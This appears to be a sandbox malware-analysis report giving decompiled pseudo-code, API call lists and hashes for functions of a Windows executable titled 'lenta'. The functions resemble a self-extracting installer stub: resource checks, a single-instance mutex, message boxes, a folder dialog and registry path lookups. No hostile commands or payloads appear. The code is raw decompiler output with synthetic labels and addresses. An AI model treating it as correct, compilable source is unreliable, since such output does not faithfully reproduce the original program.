                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0xf39a34;
                                                                        					if(E00F3468F("EXTRACTOPT", 0xf39a34, 4) != 0) {
                                                                        						if(( *0xf39a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0xf39120 =  *0xf39120 & _t65;
                                                                        							if(E00F35C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0xf38a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0xf38184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0xf38a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E00F336EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0xf39a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0xf39a34 & 0x00000100) == 0 || ( *0xf38a38 & 0x00000001) != 0 || E00F318A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E00F36517(_t57, 0x7d6, _t34, E00F319E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00F32390(0xf38a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E00F344B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E00F3468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0xf38588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0xf39a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E00F344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E00F344B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0xf38588);
                                                                        										 *0xf39124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0xf39124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}




















                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F32CD9
                                                                        • memset.MSVCRT ref: 00F32CE9
                                                                        • memset.MSVCRT ref: 00F32CF9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00F32DBD
                                                                        • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32E0A
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                        • API String ID: 1002816675-2993962200
                                                                        • Opcode ID: 41bacac6306947671d3b83246ff83821b2ec74357e75c79fa2203793883e7e4a
                                                                        • Instruction ID: 1c5275aa5977d4a77e1e6ab730fb52d569b0c0cb6c9d270d3e66663cad1cc8b4
                                                                        • Opcode Fuzzy Hash: 41bacac6306947671d3b83246ff83821b2ec74357e75c79fa2203793883e7e4a
                                                                        • Instruction Fuzzy Hash: 5A510870704305AAEBA4AB35DC4BB7B369AEB45770F044029F981D52D1DBFCD881FA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00F334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0xf391d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0xf38584 = _t35;
                                                                        					E00F343D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0xf38184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "lenta");
                                                                        					_t17 = CreateThread(0, 0, E00F34FE0, 0, 0, 0xf38798);
                                                                        					 *0xf3879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E00F344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0xf3858c);
                                                                        					_t38 =  *0xf38584; // 0x0
                                                                        					_t25 = E00F344B9(_t38, 0x4b2, 0xf31140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0xf391d8 = 1;
                                                                        						SetEvent( *0xf3858c);
                                                                        						_t39 =  *0xf3879c; // 0x0
                                                                        						E00F33680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0xf3858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0xf3879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 00F33535
                                                                        • EndDialog.USER32(?,?), ref: 00F33541
                                                                        • ResetEvent.KERNEL32 ref: 00F3355F
                                                                        • SetEvent.KERNEL32(00F31140,00000000,00000020,00000004), ref: 00F33590
                                                                        • GetDesktopWindow.USER32 ref: 00F335C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F335F1
                                                                        • SendMessageA.USER32(00000000), ref: 00F335F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00F33610
                                                                        • SendMessageA.USER32(00000000), ref: 00F33617
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F33623
                                                                        • CreateThread.KERNEL32 ref: 00F33637
                                                                        • EndDialog.USER32(?,00000000), ref: 00F33671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: lenta
                                                                        • API String ID: 2406144884-2780258678
                                                                        • Opcode ID: 8ae3221b9ad09de77eac41210e7474c1cbc960aac1ab722f2e1baf96a946acb0
                                                                        • Instruction ID: e5d65336f70d045394af8082bb6ed7325b4342abb436ff948f009cb2feffcaf8
                                                                        • Opcode Fuzzy Hash: 8ae3221b9ad09de77eac41210e7474c1cbc960aac1ab722f2e1baf96a946acb0
                                                                        • Instruction Fuzzy Hash: EC31E331640309BFD760AF26EC0EE2B3A6AE785B71F144529F642952B0CB799A01FF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00F34224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E00F344B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0xf388c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0xf387a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0xf38598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E00F34200;
                                                                        					_v28 = 0xf388c0;
                                                                        					 *0xf3a288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0xf3a288(_t32, 0xf388c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0xf388c0 != 0) {
                                                                        							E00F31680(0xf387a0, 0x104, 0xf388c0);
                                                                        						}
                                                                        						 *0xf3a288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0xf387a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0xf388c0);
                                                                        					_t61 = 0xf388c0;
                                                                        					_t4 =  &(_t61[1]); // 0xf388c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0xf388c0; // 0x1e71181
                                                                        					_t44 = CharPrevA(0xf388c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xf388c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}





























                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00F34236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F3424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F34263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F3427A
                                                                        • GetTempPathA.KERNEL32(00000104,00F388C0,?,00000001), ref: 00F3429F
                                                                        • CharPrevA.USER32(00F388C0,01E71181,?,00000001), ref: 00F342C2
                                                                        • CharPrevA.USER32(00F388C0,00000000,?,00000001), ref: 00F342D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F34391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F343A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 1b72aaee4004ad42a2f5965db0c0e01ab37691884ff4b7e9164ced38c372816d
                                                                        • Instruction ID: 5c13aad0da75bb32f90d2977fef2a1672f6f1a7ce62394276944fa9555a52c85
                                                                        • Opcode Fuzzy Hash: 1b72aaee4004ad42a2f5965db0c0e01ab37691884ff4b7e9164ced38c372816d
                                                                        • Instruction Fuzzy Hash: FE41D674E00308AFD711AB65DC88A6EBBB5EB453B4F040169F981A3351CB78AC02F761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0xf38a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0xf39a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E00F31680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E00F3171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E00F3171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E00F3681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E00F367C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E00F3681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E00F367C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                        • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F345A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00F345E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00F3460D
                                                                        • MessageBeep.USER32(00000000), ref: 00F34630
                                                                        • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00F34666
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F3466F
                                                                          • Part of subcall function 00F3681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F3686E
                                                                          • Part of subcall function 00F3681F: GetSystemMetrics.USER32(0000004A), ref: 00F368A7
                                                                          • Part of subcall function 00F3681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F368CC
                                                                          • Part of subcall function 00F3681F: RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,?,0000000C), ref: 00F368F4
                                                                          • Part of subcall function 00F3681F: RegCloseKey.ADVAPI32(?), ref: 00F36902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                        • API String ID: 3244514340-1000497449
                                                                        • Opcode ID: 8ce04227b2f42e6774088bc46ddb930864afa88a332b2f22be22004d0a3a80d4
                                                                        • Instruction ID: 13de7fdb69d6dfaeb129699e921803870fb4ad11e88dc7136411d482a87dc128
                                                                        • Opcode Fuzzy Hash: 8ce04227b2f42e6774088bc46ddb930864afa88a332b2f22be22004d0a3a80d4
                                                                        • Instruction Fuzzy Hash: 12510672D00219ABDB21AF28CC49BAABB69EF45330F044194FD59A7241DB75FE05EB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F32773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E00F31781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E00F3658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E00F3658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0xf31140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E00F31680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}
























                                                                        APIs
                                                                        • CharUpperA.USER32(C69E30F7,00000000,00000000,00000000), ref: 00F327A8
                                                                        • CharNextA.USER32(0000054D), ref: 00F327B5
                                                                        • CharNextA.USER32(00000000), ref: 00F327BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F32829
